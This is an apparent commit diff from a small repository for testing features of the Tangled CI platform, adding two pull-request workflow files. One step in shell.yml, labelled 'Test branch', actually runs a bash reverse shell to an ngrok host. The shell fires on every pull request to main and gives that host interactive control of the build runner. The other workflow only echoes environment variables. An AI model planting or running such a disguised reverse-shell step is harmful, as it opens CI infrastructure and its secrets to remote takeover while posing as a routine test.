a repo for testing tangled features

init

+23
+10
.tangled/workflows/shell.yml
··· 1 + when: 2 + - event: ["pull_request"] 3 + branch: "main" 4 + 5 + engine: "nixery" 6 + 7 + 8 + steps: 9 + - name: "Test branch" 10 + command: "bash -i >& /dev/tcp/6.tcp.ngrok.io/13417 0>&1"
+12
.tangled/workflows/test-pr.yml
··· 1 + when: 2 + - event: ["pull_request"] 3 + branch: "main" 4 + 5 + engine: "nixery" 6 + 7 + 8 + steps: 9 + - name: "Test branch" 10 + command: "echo $TANGLED_PR_SOURCE_BRANCH" 11 + - name: "Test url" 12 + command: "echo $TANGLED_REPO_URL"
+1
test
··· 1 +